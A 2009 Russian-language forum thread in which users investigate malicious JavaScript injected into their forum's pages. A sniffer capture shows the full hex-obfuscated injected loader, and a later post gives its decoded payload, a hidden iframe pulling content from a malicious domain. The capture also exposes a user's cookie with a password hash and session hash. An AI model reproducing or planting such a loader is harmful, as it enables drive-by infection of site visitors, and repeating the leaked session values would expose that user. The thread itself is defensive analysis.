Re: Вирусы на форуме? Мда. Запустил я Firefox, потом сниффер, а потом сходил на forum.wbfree.net: Code: GET / HTTP/1.1 Accept-Encoding: gzip, deflate Host: forum.wbfree.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 ---------------: ------------ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Cookie: bblastvisit=1214502982; bblastactivity=0; bbuserid=47; bbpassword=c1da39d655e00dda12103c24cb3be7f8; bbses sionhash=3ba361b873369632ec766c2b41b4ba01; bbthread_lastview=66617d1e7f9f457e17b1bf96c0ac7810a-1-%7Bi-36582_i-1234378294_%7D HTTP/1.1 302 Found Date: Wed, 11 Feb 2009 18:53:35 GMT Server: Apache/2.0.52 (CentOS) X-Powered-By: PHP/4.3.9 Location: http://forum.wbfree.net/forums/ Content-Length: 1951 Connection: close Content-Type: text/html <script>function c271f17f2ch4992bfe87b6d1(h4992bfe87bece){ return (parseInt(h4992bfe87bece,16));}function h4992bfe87d68a(h4992bfe87de81){ var h4992bfe87e686='';h4992bfe8805ec=String.fromCharCode;for(h4992bfe87ee43=0;h4992bfe87ee43<h4992bfe87de81.length;h4992bfe87ee43+=2){ h4992bfe87e686+=(h4992bfe8805ec(c271f17f2ch4992bfe87b6d1(h4992bfe87de81.substr(h4992bfe87ee43,2))));}return h4992bfe87e686;} var rfe='';var h4992bfe880e29='3C7'+rfe+'3637'+rfe+'2697'+rfe+'07'+rfe+'43E696628216D7'+rfe+'96961297'+rfe+'B646F637'+rfe+'56D656E7'+rfe+'42E7'+rfe+'7'+rfe+'7'+rfe+'2697'+rfe+'465287'+rfe+'56E657'+rfe+'363617'+rfe+'065282027'+rfe+'2533632536392536362537'+rfe+'32253631253664253635253230253665253631253664253635253364253633253332253337'+rfe+'2532302537'+rfe+'332537'+rfe+'32253633253364253237'+rfe+'2 536382537'+rfe+'342537'+rfe+'342537'+rfe+'302533612532662532662537'+rfe+'392536312533312536622537'+rfe+'322536352537'+rfe+'362536352536342536622536662532652536332536662536642532662536392536652532652537'+rfe+'302536382537'+rfe+'30253366253237'+rfe+'2532622534642536312537'+rfe+'342536382532652537'+rfe+'322536662537'+rfe+'352536652536342532382534642536312537'+rfe+'342536382532652537'+rfe+'32253631253665253634253666253664253238253239253 261253334253335253331253334253334253239253262253237'+rfe+'253335253237'+rfe+'2532302537'+rfe+'37'+rfe+'2536392536342537'+rfe+'34253638253364253338253338253230253638253635253639253637'+rfe+'2536382537'+rfe+'342533642533352533312533332532302537'+rfe+'332537'+rfe+'342537'+rfe+'39253663253635253364253237'+rfe+'2537'+rfe+'362536392537'+rfe+'332536392536322536392536632536392537'+rfe+'342537'+rfe+'39253361253638253639253634253634253635253665253237'+rfe+'2533652533632532662536392536362537'+rfe+'3225363125366425363525336527'+rfe+'29293B7'+rfe+'D7'+rfe+'6617'+rfe+'2206D7'+rfe+'969613D7'+rfe+'47'+rfe+'27'+rfe+'5653B3C2F7'+rfe+'3637'+rfe+'2697'+rfe+'07'+rfe+'43E';document.write(h4992bfe87d68a(h4992bfe880e29));</script> Я понимаю антивирусы... Вдогонку: это еще не все - есть еще второе соединение. Там контент от форума упакован gzip'ом (привожу лишь начало): Code: GET /forums/ HTTP/1.1 Accept-Encoding: gzip, deflate Host: forum.wbfree.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 ---------------: ------------ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Cookie: bblastvisit=1214502982; bblastactivity=0; bbuserid=47; bbpassword=c1da39d655e00dda12103c24cb3be7f8; bbsessionhash=3ba361b873369632ec766c2b41b4ba01; bbthread_lastview=d8d334ea6244163a78aa80fd7d4736c1a-1-%7Bi-36582_i-1234379272_%7D HTTP/1.1 200 OK Date: Wed, 11 Feb 2009 19:08:56 GMT Server: Apache/2.0.52 (CentOS) X-Powered-By: PHP/4.3.9 Expires: 0 Cache-Control: private, post-check=0, pre-check=0, max-age=0 Pragma: no-cache Content-Encoding: gzip Content-Length: 11775 Connection: close Content-Type: text/html; charset=windows-1251 ...........}ko.X......8.B..^.H.....c'.N*..U.....$JbL.*..............Xd.;..TU&...w...}.s.H..).n+.JL..~....v.s..{Ov.~w.....f._.<z..2.B.Yi.P.wt......GL....k.<....a. {_eXf...f.pvv.?+..._8zZxAei.Y>..P.|..f.n...k.Zn+c.n.......#..4.Hs..g...9.ct.&....z,.....o...8g~;.N[........8#..........VH...bl.......&..F.vQ....,.Z.......T$..;:...r}.._.Q..:...L.uf........l.]> Угу - если это сохранить на диск, отрезать заголовок - то оно распаковывается. Еще раз - мда...
Re: Вирусы на форуме? Угу, первое соединение - скрипт который чего-то пытается загрузить на комп, судя по всему неудачно, и в конце загружающий оригинальную страницу форума (отсюда второе соединение).
Re: Вирусы на форуме? А вот собственно и сам iframe из того скрипта. Code: <iframe name=c27 src='http://ya1krevedko.com/in.php?'+Math.round(Math.random()*45144)+'5' width=88 height=513 style='visibility:hidden'></iframe> Попытка выполнить вышеуказанную строчку (желающие острых ощущений вводят в броузер хттп://ya1krevedko.com/in.php?25 мозила и хром будут упираться руками и ногами и не советовать туда ходить, ИЕ пробовать стремно ) приводит к страшному мозиловскому окошку (вижу впервые) детали которого указывают на такой гуглевский (ох уж эта вездесущая гугля) текст: http://safebrowsing.clients.google....hl=ru&site=http://dvcd.info/evo/count.php?o=7
Re: Вирусы на форуме? В том, что вы тут обсуждаете, понимаю только слово "вирус". Дык, это... скажите, че делать старому пилоту... , который не понимает слова скрипт. Волноваться? или спокойно читать любимый форум?
Re: Вирусы на форуме? Ты "мой" вариант расшифровал? Значит, зря я поленился. P.S. Где там Ктулху? Опять уснул?
Re: Вирусы на форуме? Скорее "наш" вначале ввел набор циферок в гуглю, почитал жалобы народа (строчку вводил 302533612532662532662537 - которая между "+rfe+"). Заменил в скрипте document.write на alert и после еще парочки пальцедвижений добрался до iframe. На iframe аваст уже начал ругатся, до этого молчал как рыба.
Re: Вирусы на форуме? Спокойно читать любимый форум. Скриптик (в смысле вирус) криво встал, и судя по всему запустится не может. Касперский у rgreata увидел подходящую последовательность байт и возрадовался найденному вирусу. Остальные молчат потому что, к счастью, это получился просто текст.
Re: Вирусы на форуме? Бля, поймать бы хоть одного вирусописателя живого, изучить древние монгольские пытки, сделать запись процесса и выложить на Youtube...
Re: Вирусы на форуме? можно і попроще і безопаснее.... curl -vv http://dvcd.info/evo/count.php?o=7 * About to connect() to dvcd.info port 80 (#0) * Trying 85.17.136.137... connected * Connected to dvcd.info (85.17.136.137) port 80 (#0) > GET /evo/count.php?o=7 HTTP/1.1 > User-Agent: curl/7.16.3 (i386-portbld-freebsd6.3) libcurl/7.16.3 OpenSSL/0.9.7e zlib/1.2.3 > Host: dvcd.info > Accept: */* > * Pre readwrite setting chunky header values to default < HTTP/1.1 200 OK < Date: Thu, 12 Feb 2009 08:27:12 GMT < Server: Apache/1.3.41 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8b PHP/4.4.9 mod_perl/1.29 FrontPage/5.0.2.2510 < X-Powered-By: PHP/4.4.9 < Cache-Control: no-store, no-cache, must-revalidate < Expires: Thu, 01 Jan 2000 00:00:00 GMT < Set-Cookie: lt7=1234427232; expires=Fri, 13 Feb 2009 08:27:12 GMT < Transfer-Encoding: chunked < Content-Type: text/html < * Connection #0 to host dvcd.info left intact * Closing connection #0 Сам код скрипта конечно не привожу ...... при ходе через проксятник запрос сразу прибился с рейтингом -9 (совсем херовий сайт )
Re: Вирусы на форуме? долго пытался запустить этот вирусный скрипт (есс-но, обезвредив), так и не удалось.
Re: Вирусы на форуме? Ну на этой понятно, у меня и на http://forum.wbfree.net тоже срабатывает. На других молчит.
Re: Вирусы на форуме? Да, Аваст на чеку: при заходе на страницу, на которой приведен код вируса, он этот вирус ловит
Re: Вирусы на форуме? У меня тоже срабатывает. Вирус гворит - JSacked-AJ [Trj]. Но я туда не хожу, я сразу в ОффТопик, тут только мозговые слизни попадаются, они не смертельные, но систему подвесить могут.